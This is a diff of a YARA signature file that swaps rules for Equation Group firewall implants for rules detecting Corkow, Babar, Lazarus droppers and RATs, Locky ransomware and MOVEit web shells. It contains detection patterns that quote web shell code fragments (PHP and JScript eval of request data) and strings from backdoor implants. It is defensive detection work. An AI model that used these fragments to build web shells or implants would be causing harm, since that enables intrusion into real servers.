-		$x4 = "%s version %s already has persistence installed. If you want to uninstall," fullword ascii
-		$x5 = "The active module(s) on the target are not meant to be persisted" fullword ascii
+		$x_aspx = /%@\sPage\sLanguage=.Jscript.%><%eval\(Request\.Item\[.{,100}unsafe/
+		$x_php = /<?php.\@eval\(\$_POST./
+		$fp1 = "GET /"
+		$fp2 = "POST /"
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and 1 of them ) or ( 3 of them )
+		filesize < 300KB and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen6 : FILE
+
+rule SIGNATURE_BASE_Corkowdll : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b1c6426-7274-5fd4-9ea2-ef10bda769d4"
-		date = "2016-08-16"
+		description = "Rule to detect the Corkow DLL files"
+		author = "Group IB"
+		id = "cc9d2bb3-8db3-54a0-bd05-7f054ce84633"
+		date = "2016-01-02"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L923-L951"
+		reference = "https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_corkow_dll.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9f0aa1994199c8cef543b7602b574726171dd96df159a0c496db0c60c339c4d0"
+		logic_hash = "072112c79f20ba08b7ef71d3dacff7eb947b4a27bf6381ce788e229f2f791cdf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" fullword ascii
-		$s2 = "LP.c:pixSecurity - Not in Session" fullword ascii
-		$s3 = "getModInterface__preloadedModules" fullword ascii
-		$s4 = "showCommands" fullword ascii
-		$s5 = "readModuleInterface" fullword ascii
-		$s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" fullword ascii
-		$s7 = "Get_CMD_List" fullword ascii
-		$s8 = "LP_Listen2" fullword ascii
-		$s9 = "killCmdList" fullword ascii
+		$binary1 = { 60 [0-8] 9C [0-8] BB ?? ?? ?? ?? [0-8] 81 EB ?? ?? ?? ?? [0-8] E8 ?? 00 00 00 [0-8] 58 [0-8] 2B C3 }
+		$binary2 = { (FF 75 ?? | 53) FF 75 10 FF 75 0C FF 75 08 E8 ?? ?? ?? ?? [3-9] C9 C2 0C 00 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and all of them )
+		uint16( 0 ) == 0x5a4d and ( all of ( $binary* ) and ( pe.exports ( "Control_RunDLL" ) or pe.exports ( "ServiceMain" ) or pe.exports ( "DllGetClassObject" ) ) or ( pe.exports ( "ServiceMain" ) and pe.exports ( "Control_RunDLL" ) ) )
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen5 : FILE
+rule SIGNATURE_BASE_SNOWGLOBE_Babar_Malware : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
+		description = "Detects the Babar Malware used in the SNOWGLOBE attacks - file babar.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e35748ee-d530-5e73-a74d-5675d05725e9"
-		date = "2016-08-16"
+		id = "53a61065-a3b3-563e-8ecc-513d8da68085"
+		date = "2015-02-18"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L953-L978"
+		reference = "http://motherboard.vice.com/read/meet-babar-a-new-malware-almost-certainly-created-by-france"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_snowglobe_babar.yar#L4-L37"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d4bbd9dbde4ca1da80d49157363ade3ec47d55828529ec7e1a46b64d07c991f0"
-		score = 75
+		hash = "27a0a98053f3eed82a51cdefbdfec7bb948e1f36"
+		logic_hash = "a93425a95efe471b815e2daf0b5e290b3472b722c6a48f8c22f0a6e9c588ffc9"
+		score = 80
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
 
 	strings:
-		$x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" fullword ascii
-		$s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" fullword ascii
-		$s2 = "%s/BF_%04d%02d%02d.log" fullword ascii
-		$s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" fullword ascii
+		$z0 = "admin\\Desktop\\Babar64\\Babar64\\obj\\DllWrapper" ascii fullword
+		$z1 = "User-Agent: Mozilla/4.0 (compatible; MSI 6.0;" ascii fullword
+		$z2 = "ExecQueryFailled!" fullword ascii
+		$z3 = "NBOT_COMMAND_LINE" fullword
+		$z4 = "!!!EXTRACT ERROR!!!File Does Not Exists-->[%s]" fullword
+		$s1 = "/s /n %s \"%s\"" fullword ascii
+		$s2 = "%%WINDIR%%\\%s\\%s" fullword ascii
+		$s3 = "/c start /wait " fullword ascii
+		$s4 = "(D;OICI;FA;;;AN)(A;OICI;FA;;;BG)(A;OICI;FA;;;SY)(A;OICI;FA;;;LS)" ascii
+		$x1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\" ascii
+		$x2 = "%COMMON_APPDATA%" fullword ascii
+		$x4 = "CONOUT$" fullword ascii
+		$x5 = "cmd.exe" fullword ascii
+		$x6 = "DLLPATH" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and 1 of ( $x* ) ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1MB and ( ( 1 of ( $z* ) and 1 of ( $x* ) ) or ( 3 of ( $s* ) and 4 of ( $x* ) ) )
 }
-rule SIGNATURE_BASE_EQGRP_Pandarock : FILE
+
+rule SIGNATURE_BASE_APT_Lazarus_Dropper_Jun18_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit"
+		description = "Detects Lazarus Group Dropper"
 		author = "Florian Roth (Nextron Systems)"
-		id = "aa0ee05b-b3e4-576a-8a32-bdc8d98fe636"
-		date = "2016-08-16"
+		id = "226be9d4-93c0-5512-9667-3388cd6f20d4"
+		date = "2018-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L980-L1007"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d0a61410d7c5f309489ef4553f41a3a6fb7d0f24bcdb1f0d88e896265513add2"
-		score = 75
-		quality = 85
+		logic_hash = "868297209177471f29c9653747d3205f55a14b74a5da64562b20ebeadb14b1cf"
+		score = 60
+		quality = 65
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f"
-		hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe"
+		hash1 = "086a50476f5ceee4b10871c1a8b0a794e96a337966382248a8289598b732bd47"
+		hash2 = "9f2d4fd79d3c68270102c4c11f3e968c10610a2106cbf1298827f8efccdd70a9"
 
 	strings:
-		$x1 = "* Not attempting to execute \"%s\" command" fullword ascii
-		$x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" fullword ascii
-		$x3 = "execute code in <file> passing <argX> (HEX)" fullword ascii
-		$x4 = "* Use arrow keys to scroll through command history" fullword ascii
-		$s1 = "pitCmd_processCmdLine" fullword ascii
-		$s2 = "execute all commands in <file>" fullword ascii
-		$s3 = "__processShellCmd" ascii
-		$s4 = "pitTarget_getDstPort" fullword ascii
-		$s5 = "__processSetTargetIp" ascii
-		$o1 = "Logging commands and output - ON" fullword ascii
-		$o2 = "This command is too dangerous.  If you'd like to run it, contact the development team" fullword ascii
+		$s1 = /%s\\windows10-kb[0-9]{7}.exe/ fullword ascii
+		$s2 = "EYEJIW" fullword ascii
+		$s3 = "update" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 4 of them ) or 1 of ( $o* )
+		uint16( 0 ) == 0x5a4d and filesize < 21000KB and ( pe.imphash ( ) == "fcac768eff9896d667a7c706d70712ce" or all of them )
 }
-rule SIGNATURE_BASE_EQGRP_Bananausurper_Writejetplow : FILE
+rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
+		description = "Detects Lazarus Group RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "901af182-cbfa-533a-a055-565d95005d62"
-		date = "2016-08-16"
+		id = "fd394d15-70c5-543a-a845-2058f296b5f8"
+		date = "2018-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1009-L1028"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L34-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "101e75800291a7603e03145bff298d7587c9b5f19102e7ba9ed3bf2b544fa5cf"
+		logic_hash = "7260f766ffd1122319ca69a6c87b0baa98d5727929f2e063a5b2edb05a44d827"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+		hash1 = "c10363059c57c52501c01f85e3bb43533ccc639f0ea57f43bae5736a8e7a9bc8"
+		hash2 = "e98991cdd9ddd30adf490673c67a4f8241993f26810da09b52d8748c6160a292"
 
 	strings:
-		$x1 = "Implant Version-Specific Values:" fullword ascii
-		$x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" fullword ascii
-		$s1 = "createSendRecv: recv'd an error from the target." fullword ascii
-		$s2 = "Error: WatchDogTimeout read returned %d instead of 4" fullword ascii
+		$a1 = "www.marmarademo.com/include/extend.php" fullword ascii
+		$a2 = "www.33cow.com/include/control.php" fullword ascii
+		$a3 = "www.97nb.net/include/arc.sglistview.php" fullword ascii
+		$c1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"example.dat\"" fullword ascii
+		$c2 = "Content-Disposition: form-data; name=\"file1\"; filename=\"pratice.pdf\"" fullword ascii
+		$c3 = "Content-Disposition: form-data; name=\"file1\"; filename=\"happy.pdf\"" fullword ascii
+		$c4 = "Content-Disposition: form-data; name=\"file1\"; filename=\"my.doc\"" fullword ascii
+		$c5 = "Content-Disposition: form-data; name=\"board_id\"" fullword ascii
+		$s1 = "Winhttp.dll" fullword ascii
+		$s2 = "Wsock32.dll" fullword ascii
+		$s3 = "WM*.tmp" fullword ascii
+		$s4 = "FM*.tmp" fullword ascii
+		$s5 = "Cache-Control: max-age=0" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of ( $x* ) ) or ( 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $a* ) or 2 of ( $c* ) or 4 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen4 : FILE
+rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_2 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
+		description = "Detects Lazarus Group RAT"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8b2061f0-862d-51de-a7d0-7a36d3e71d61"
-		date = "2016-08-16"
+		id = "4f2e280e-ed76-5fb9-b137-5191bbea2155"
+		date = "2018-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1030-L1051"
+		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_jun18.yar#L68-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3bfcef33e9a0a1753fd21458ee3173284f98942d30a496c5183c79a7df960208"
+		logic_hash = "b22b8386791e86f787efc40a394bbabdb4a009fc2d1a7b87aaf5039fc977a5bd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
+		hash1 = "e6096fb512a6d32a693491f24e67d772f7103805ad407dc37065cebd1962a547"
 
 	strings:
-		$s1 = "Command has not yet been coded" fullword ascii
-		$s2 = "Beacon Domain  : www.%s.com" fullword ascii
-		$s3 = "This command can only be run on a PIX/ASA" fullword ascii
-		$s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" fullword ascii
-		$s5 = "Printing the interface info and security levels. PIX ONLY." fullword ascii
+		$s1 = "\\KB\\Release\\" ascii
+		$s3 = "KB, Version 1.0" fullword wide
+		$s4 = "TODO: (c) <Company name>.  All rights reserved." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 3 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen3 : FILE
+rule SIGNATURE_BASE_APT_MAL_DNS_Hijacking_Campaign_AA19_024A : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
+		description = "Detects malware used in DNS Hijackign campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ec64bb2b-566b-50b6-a518-222afc88d400"
-		date = "2016-08-16"
+		id = "6a476052-ba4e-5049-9c7a-f8949d26e7b5"
+		date = "2019-01-25"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1053-L1076"
+		reference = "https://www.us-cert.gov/ncas/alerts/AA19-024A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_aa19_024a.yar#L2-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32d4dd0e35ea480199f5b2032145326c3eef73243783c580605a4de6877df982"
+		logic_hash = "8e9ec132df6cf6a89f6694682292feec0f3a762c2df6b1dc8180d9ab68e7183b"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
+		hash1 = "2010f38ef300be4349e7bc287e720b1ecec678cacbf0ea0556bcf765f6e073ec"
+		hash2 = "45a9edb24d4174592c69d9d37a534a518fbe2a88d3817fc0cc739e455883b8ff"
 
 	strings:
-		$x1 = "incomplete and must be removed manually.)" fullword ascii
-		$s1 = "%s: recv'd an error from the target." fullword ascii
-		$s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" fullword ascii
-		$s3 = "upload/activate/de-activate/remove/cmd function failed" fullword ascii
+		$s2 = "/Client/Login?id=" fullword ascii
+		$s3 = "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko" fullword ascii
+		$s4 = ".\\Configure.txt" fullword ascii
+		$s5 = "Content-Disposition: form-data; name=\"files\"; filename=\"" fullword ascii
+		$s6 = "Content-Disposition: form-data; name=\"txts\"" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and 2 of them ) or ( all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of them
 }
-rule SIGNATURE_BASE_EQGRP_BLIAR_BLIQUER : FILE
+rule SIGNATURE_BASE_Locky_Ransomware
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
-		author = "Florian Roth (Nextron Systems)"
-		id = "6f83bb11-f789-544e-8dca-c2dc2c845331"
-		date = "2016-08-16"
+		description = "Detects Locky Ransomware (matches also on Win32/Kuluoz)"
+		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
+		id = "ce61e01e-a9ce-54f4-bd2d-8acf1d5fbc30"
+		date = "2016-02-17"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1078-L1111"
+		reference = "https://goo.gl/qScSrE"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_locky.yar#L8-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "59b7303dba0a79919d79627697a8724337145cd6d7b5c53cda970bf437162865"
+		hash = "5e945c1d27c9ad77a2b63ae10af46aee7d29a6a43605a9bfbf35cebbcff184d8"
+		logic_hash = "c7584ea39c4aceedeb0ea2952be6ff212461674175855274f1783eef80ffba86"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
+		tags = ""
 
 	strings:
-		$x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " fullword ascii
-		$x2 = "There is no implant present on the firewall." fullword ascii
-		$x3 = "Implant Version :%lx%lx%lx" fullword ascii
-		$x4 = "You may now connect to the implant using the pbd idkey" fullword ascii
-		$x5 = "No reply from persistant back door." fullword ascii
-		$x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" fullword ascii
-		$p1 = "PBD_GetVersion" fullword ascii
-		$p2 = "pbd/pbdEncrypt.bin" fullword ascii
-		$p3 = "pbd/pbdGetVersion.pkt" fullword ascii
-		$p4 = "pbd/pbdStartWrite.bin" fullword ascii
-		$p5 = "pbd/pbd_setNewHookPt.pkt" fullword ascii
-		$p6 = "pbd/pbd_Upload_SinglePkt.pkt" fullword ascii
-		$s1 = "Unable to fetch hook and jmp addresses for this OS version" fullword ascii
-		$s2 = "Could not get hook and jump addresses" fullword ascii
-		$s3 = "Enter the name of a clean implant binary (NOT an image):" fullword ascii
-		$s4 = "Unable to read dat file for OS version 0x%08lx" fullword ascii
-		$s5 = "Invalid implant file" fullword ascii
+		$o1 = { 45 b8 99 f7 f9 0f af 45 b8 89 45 b8 }
+		$o2 = { 2b 0a 0f af 4d f8 89 4d f8 c7 45 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and ( 1 of ( $x* ) or 1 of ( $p* ) ) ) or ( 3 of them )
+		all of ( $o* )
 }
-rule SIGNATURE_BASE_EQGRP_Sploit : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_DLL_Moveit_Jun23_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9f403965-5fb1-55b2-bef6-65c18e08e58f"
-		date = "2016-08-16"
+		description = "Detects compiled ASPX web shells found being used in MOVEit Transfer exploitation"
+		author = "Florian Roth"
+		id = "47db8602-9a9e-5efc-b8b9-fbc4f3c8d4e9"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1113-L1135"
+		reference = "https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/?utm_content=251159938&utm_medium=social&utm_source=twitter&hss_channel=tw-403811306"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L2-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "083f103dee6b209626c4d790dff0e53af757945ded63409b26bbe143c78e30eb"
-		score = 75
+		logic_hash = "47c2ec1e833852941434586b61d6f435b9acb32b2ff48e0a9e8006e0f9ff8056"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
-		hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
+		hash1 = "6cbf38f5f27e6a3eaf32e2ac73ed02898cbb5961566bb445e3c511906e2da1fa"
 
 	strings:
-		$s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" fullword ascii
-		$s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" fullword ascii
-		$s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" fullword ascii
-		$s4 = "exp.load_vinfo()" fullword ascii
-		$s5 = "if not okay and self.terminateFlingOnException:" fullword ascii
-		$s6 = "print \"[-] keyboard interrupt before response received\"" fullword ascii
-		$s7 = "if self.terminateFlingOnException:" fullword ascii
-		$s8 = "print 'Debug info ','='*40" fullword ascii
+		$x1 = "human2_aspx" ascii fullword
+		$x2 = "X-siLock-Comment" wide
+		$x3 = "x-siLock-Step1" wide
+		$a1 = "MOVEit.DMZ.Core.Data" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x2123 and filesize < 90KB and 1 of ( $s* ) ) or ( 4 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $x* ) and $a1 ) or all of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen2 : FILE
+rule SIGNATURE_BASE_WEBSHELL_ASPX_Moveit_Jun23_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
-		author = "Florian Roth (Nextron Systems)"
-		id = "58b0b51d-d1f8-5ee2-a4af-491c49dd0573"
-		date = "2016-08-16"
+		description = "Detects ASPX web shells as being used in MOVEit Transfer exploitation"
+		author = "Florian Roth"
+		id = "2c789b9c-5ec5-5fd1-84e3-6bf7735a9488"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1137-L1168"
+		reference = "https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L24-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "c3cbe11ae38f5affffab247cdc618d0afb5a0feda6ea4b2f43dd8edb2fbf2b11"
-		score = 75
+		logic_hash = "436f9a503ad938541faa8f34604310ba6d932e40a41dc189ccd293b7191a7621"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+		hash1 = "2413b5d0750c23b07999ec33a5b4930be224b661aaf290a0118db803f31acbc5"
+		hash2 = "48367d94ccb4411f15d7ef9c455c92125f3ad812f2363c4d2e949ce1b615429a"
+		hash3 = "e8012a15b6f6b404a33f293205b602ece486d01337b8b3ec331cd99ccadb562e"
 
 	strings:
-		$x1 = "Modules persistence file written successfully" fullword ascii
-		$x2 = "Modules persistence data successfully removed" fullword ascii
-		$x3 = "No Modules are active on the firewall, nothing to persist" fullword ascii
-		$s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " fullword ascii
-		$s2 = "Error while attemping to persist modules:" fullword ascii
-		$s3 = "Error while reading interface info from PIX" fullword ascii
-		$s4 = "LP.c:pixFree - Failed to get response" fullword ascii
-		$s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" fullword ascii
-		$s6 = "Unable to fetch config address for this OS version" fullword ascii
-		$s7 = "LP.c: interface information not available for this session" fullword ascii
-		$s8 = "[%s:%s:%d] ERROR: " fullword ascii
-		$s9 = "extract_fgbg" fullword ascii
+		$s1 = "X-siLock-Comment" ascii fullword
+		$s2 = "]; string x = null;" ascii
+		$s3 = ";  if (!String.Equals(pass, " ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 3000KB and 1 of ( $x* ) ) or ( 5 of them )
+		filesize < 150KB and 2 of them
 }
-rule SIGNATURE_BASE_EQGRP_Implants_Gen1 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_1
 {
 	meta:
-		description = "EQGRP Toolset Firewall"
-		author = "Florian Roth (Nextron Systems)"
-		id = "af0a1a2c-0efb-568f-9e80-baee7398fea2"
-		date = "2016-08-16"
+		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
